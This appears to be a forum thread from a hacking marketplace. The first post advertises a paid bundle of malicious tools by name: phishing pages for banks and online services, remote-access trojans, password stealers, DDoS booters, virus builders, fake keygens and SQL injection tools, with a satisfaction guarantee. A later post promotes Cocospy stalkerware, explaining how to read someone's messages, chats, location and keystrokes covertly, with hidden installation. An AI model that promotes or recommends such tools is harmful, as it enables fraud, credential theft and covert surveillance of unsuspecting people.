Website_Crasherv4.7 XDos zDoS --------------------------------------------------------------------- Fake Programs (24): Cod_Mw2_Keygen-Idecrypt CoD-Mw2-Keygen ddoser_3.6 Dice_RiggerDoXiE__1.2 emblem_crypter FAKE_Steam_Keygen FlexBot_Runescape Flooder Gamebattles_Credit_Adder Microsoft_Point_Generator MSDN_admin MSN_Password_Cracker Multi-Hacker MW2_Serial_Generator Norton_2010_Keygen Paypal_Money_hack PayPal_Money_Hacker Poker_Hack Rapidshare Extender Runescape_Stat_Changer teamviewer_patch Windows_7_Serial_Generater Windows_Activator WoW_account_hacker XBox_360_Account_Hacker --------------------------------------------------------------------- Host Boosters (8): BioZombie dbot DDoSeR_3.4 Host_Booter Metus_GB_Edition MeTuS-Delphi-2.8 X-R z3r0xb0t_Final_Public_Release_[v2.0] --------------------------------------------------------------------- Phishing Pages (56): eBay.com Fake Login Page(Tut) Gmail.de Playstation Underground RapidShare.com RapidShare.de Abbey ( CC ) Phisher Abbey Phisher AceMailer-v1 Adult Friend Finder Phisher AIM Phisher Amazon Phisher AnonymousMailer astatalk Phisher Chase Phisher DeviantArt Phisher Dynamic_RapidShare_Phisher_v0.8 E-Trade Phisher facebook Phisher FileFront Phisher FreeWebs Phisher Friendster Phisher Gaia Gold generator Fake login Gmail Phisher GoDaddy Phisher Habbo Phisher Hi 5 Phisher hotmail Phisher HP ( Shop ) Phisher IMVU Phisher IP Hider Jiffy Gmail Account Creator MySpace Phisher [9:29:43 PM]Krrr baw: Nationwide Phisher PayPal Phisher Phisher Maker! Phishing Letters Photobucker Phiser PornoTube Phisher RapidExtract Regions Phisher Ripway Phisher RuneScape Phisher SendSpace Phisher Skype Phisher SourceForge Phisher Steam Phiser Tagged Phisher Tarantula thisis50 Phisher Warez-bb Phisher Wells Fargo Phisher WoW Phisher WWE Phisher XboxLive Phisher YouTube Phisher --------------------------------------------------------------------- Remote Administration Tools: (86) bn135 SubSeven 2.2 [BUGFIX]Schwarze Sonne RAT 0.8.1 [BUGFIX]SS-RAT 0.4 Final A32s (fifth) RAT Apocalypse144 Arabian-Attacker v1.2.2 Arabian-Attacker v1.4.0 Archelaus Beta Arctic R.A.T. 0.0.1 Alpha Beast v2.07 Bifrost12 Cerberus RAT 1.03.4 Beta Cerberus Char0n CIA_v1.3 CyberGate v1.00.1 CyberGate v1.02.0 CyberGate v1.03.0 CyberGate v1.04.8 CyberGate_v1.01.8 CyberGate-v1.00.0 Daleth RAT 1.0(ss rat src) DarkComet2RC1 DarkComet2RC5 DarkComet-RAT 2.0 Final RC2 DarkComet-RAT 2.0 Final DarkComet-RAT 2.0 LAST BETA DarkComet-RAT 2.0b 2 DarkComet-RAT 2.0b3 DarkComet-RAT Beta Test 01 DarkMoon v4.11 Deeper 1.0 Beta10 - Fix1 Deeper_1.0_Beta8 Deeper_1.0_Beta9 DRAT 2009 V4.0 Build 1201 DRAT 2009 V4.2 Build 1216 Golden Phoenix Rat 0.2 GraphicBooting RAT Beta v0.3 Lost Door 4.2.2 Lost Door V2.2 Stable Public edition Lost Door v4.3.1 Lost_Door_V4.2_light MiniMo v0.7a PublicBeta MiniMo_v0.7a_PublicBeta miniRAT 0.6 Beta MofoTro NetDevil_v1.5 NovaLite_final5 NyTrojan_RAT Optix v1.33 Optix_v1.33 PaiN RAT 0.1 Beta 9 painrat0.1Beta9 PI2.3.2 Pocket RAT Poison Ivy 2.3.2 ProRat_v1.9 SE Schwarze Sonne 0.2 Final Schwarze Sonne RAT 0.1 Final Schwarze Sonne RAT 0.1 Public Beta 2 Schwarze Sonne RAT 0.1 Public Beta Schwarze Sonne RAT 0.2 Beta Schwarze Sonne RAT 0.7 Schwarze Sonne RAT 0.8 Schwarze_Sonne_0.5_Beta Seed1.1 sharK_3 SharpEye-Rat1-0_beta2 solitude_1.0_cracked_by_DizzY_D Spt-Net_[RAT]_v2.6 Spy-Net 2.7 SS-RAT 0.3 Beta SS-RAT 0.5 Final SS-RAT 0.6 Final_bugfix SS-RAT 0.6 Public Beta SubSeven_2.3 Turkojan4 Vanguard Venomous Ivy vibe1909_10giayFamatech.Radmin.v3.1.Remote.Control.Cracked-NoGRP VorteX RAT xHacker.3. xtremeRAT Y3kRat2k5RC10 --------------------------------------------------------------------- Scanners: (23) Advanced IP Scanner Advanced Port Scanner Bitching Threads BluePortScan LanSpy NeoTracePro NetScan Tools ProPort Putty_0.6 SuperScan [Fav] Trojan Hunter 15 ZenMap - NMap V5.21 [Win] angry_ip_scanner bitchinthreads bluesprtscn bobup DD7s_Port_Scanner HLDL-5967freeipscanner ProPort superscan4 te_port_scanner TrojanHunter15 xss_scanner --------------------------------------------------------------------- Sniffers: (2) Cain & Abel Self Installer [WinXP] WireShark Self-Installer [Win32] --------------------------------------------------------------------- SQL Injection Tools: (14) Vbulletin 3.6.5 Sql Injection GYNshell.php Havij_1.08 Hexjector v1.0.7.3SE MySQLi_Dumper_v.1.2_BIN Pangolin_Professinal_Edition_v3.0.0.1011 SPInjv1.2 Sql Hack pack -Updated sql.txt SQL_Exploiter_Pro_2.15 SQL_Injection_Tool_v2.1a SQLDEFACER V3MoHackzSQLExplt yourleetdefacepage.html --------------------------------------------------------------------- Stealers: (75) 1337 SteamACC Stealer Private Allround Stealer Armageddon Stealer 1.0 by Krusty bl0b Recovery 1.0 Blade Stealer 1.0 PUBLIC Codesoft PW Stealer 0.35 Codesoft PW Stealer 0.50 Dark Screen Stealer 2 Dimension Stealer 2 by Gumball FileZilla Stealer 1.0 PUBLIC FileZilla Stealer by Stonedinfect Firefox Password Stealer - Steamcafe Fly Stealer 0.1 Fudsonly Stealer 0.1 Hackbase Steam Phisher 1.2 BETA Hackhound 0.0.1.4 Hackhound Stealer HardCore Soft 0.0.0.1 ICQ Steal0r IStealer 4.0 IStealer 6.0 Legends Keyloggers LabStealer by Xash Multi Password Stealer 1.6 Papst Steale.NET Pass Stealer 3.0 Pesca Stealer 0.2 pixel Stealer 1.3.0 SC pixel Stealer 1.4.0 ProStealer Public Firefox 3 Stealer Pure-Steam 1.0 CS Pw Stealer by Killer110 PWStealer 2.0 Remote Penetration 2.2 SC LiteStealer 1 SimpleStealer 2.1 SPS Stealer SStealer by till7 Steam Stealer 1.0 by ghstoy Steam Stealer by till7 Stupid Stealer 6 mit PHP Logger System Stealer 2 The Simpsons Stealer 0.2 Tool-Store FileZilla Stealer 1.0 Trojan Horses Ultimate Stealer 1.0 Universal1337 - The Account Stealer Universal1337 2 Universal1337 3 Viotto Keylogger 2.0 [Release]Hackhound_Stealer 1337_SteamACC_Stealer_Private AuraStealer BKL_Public_Edition_v2.0 Builder Dark_IP_Stealer_-_by_mana5olia Dark_Screen_Stealer_V2 FF_Stealer_steamcafe iStealer_3,0 iStealer_4.0 istealer_5.0 iStealer_6.3_Legends jps18 LabStealer lps Midnight_Stealer_1.5 Multi_Password_Stealer_1.6 PassStealer_v3.0 PWstealer_v2.0 Ref_Stealer_-_99__FUD Remote_Penetration_v2.2 SimpleStealer_v1.2.4.1 Universal1337_V2 UNLIMITED_PW_STEALER_0.4 --------------------------------------------------------------------- Virus Builders: (10) DELmE's Batch Virus Generator v 2.0 DrVBS hellp2p In_Shadow_Batch_Virus_Gen_-_5.0.0_-_MOD Kill_Switch Nathans_Image_Worm Pokes-Worm-Gen-2 Power Of Batch.txt Tera_Bit vbswg2 Virus-O-Matic --------------------------------------------------------------------- Vulnerability Scanners and Exploiters: (2) Metasploit Framework V3.4.0 [Win] Nessus [Win32] Why Buy from us: - We deliver full support on all of our products, So if you have any questions please let us know. - All our guides work world wide - You will get a 100% satisfaction guarantee, so if you are not 100% satisfied with your purchase we will refund your order. - If you leave positive feedback you will get a product of your choosing for free. - Instant delivery. If you have any questions please let us know.
  13. This is what I am here for. I will tell you a simple solution which will help you in spying on anyone's messages (and so much more) within a few minutes. So without further waiting, here it goes: Reading Text Messages Secretly You can read text messages on any phone, be it Android or iOS, without the knowledge of the target user. All you need is a phone spy service for it.Such services are not rare nowadays. There are so many apps that advertise phone spying solutions with top-notch services. However, an app that lives up to its claims is hard to find.So I went through all the available apps to find the one that is the pure best in this sector. If you are using it, you don't need any other thing.This is the app I am talking about: Cocospy - The Most Innovative Thing Since Sliced Bread Cocospy is a phone monitoring tool that can give you every bit of data on the target phone. It is a web-based service and it works right from your web browser on any device.Through the Cocospy dashboard that is available on Cocospy's website, you can not only view the messages of the target phone, but even get their location, social media chats, and record their phone calls too. The #1 Text Message Interceptor While there are many other services that say they can do as much as Cocospy, none is as good as Cocospy is. This is why Cocopsy is used by millions of users all over the world. With Cocospy, you can easily intercept text messages from another phone without installing the software. Here are some awesome things about Cocospy: No Root or Jailbreak: Cocospy does not require you to root or jailbreak the target device. Rooting or jailbreaking any phone makes it vulnerable to threats. Further, it also makes the other person aware that you are monitoring them. Therefore, this is a huge pro in favour of Cocospy. Web Based Service: You don't need to install any app on your phone or PC to view messages of the target user. You can do it from any web browser on any device. Stealth Mode: For iOS, Cocospy doesn't require you to install any app on the target phone. Therefore, the user doesn't find out they are being monitored. With Cocospy's iOS solution, you can read text messages from another phone without installing software.For Android, while you require a one-time app installation on the target phone, it always runs in stealth mode. The app size is less than 2 MB and the app icon vanishes after installation.When you have to uninstall the app, you can do it remotely through the Cocospy dashboard. It is as simple as that. So it is secure to read text messages from another phone without them knowing. Feature Loaded Cocospy has over 35 features which make sure that no activity of the user escapes from your eyes. The best part is that even if the user deletes any message, Cocospy will still reveal it to you. How to Read Someone's Text Messages Without Having Their Phone Using Cocospy to spy on someone's text messages without their phone is as easy as pie. All you need is an internet connection and you are good to go. Basically, it involves three steps:Step 1: Sign up for Cocospy and get a subscription plan.Step 2: Follow the simple on screen setup wizard. It will guide you in configuring Cocospy. All you have to do is a few clicks here and there.Step 3: Hit 'Start' and you are ready to begin monitoring. You will be taken to your dashboard.Alternatively, you can also click here to know how to read text messages of any phone through Cocospy. This will guide you through the process in detail.Once you are on your dashboard, you can make use of various features to spy on text messages. These include:Message MonitorGet the SMSs that are received or sent by the user. These include sender/receiver info and the content of the message along with the timestamps. Any deleted messages are also present. Most importantly, you can read someone elses text messages online for free. Social Media Monitor Cocospy has dedicated tabs for every social media platform. You can view all the chats of the user and even the photos or videos they share. Keylogger Keylogger records all the keystrokes that are made by the user. This includes text messages, browser searches, and even usernames and passwords. Takeaways Now that you know how to read anyone's text messages without their phone, you should get started with it now. Suspicions are best ended quickly. Therefore, you need to make sure that no doubt remains in your head about the other person.
×
×
  • Create New...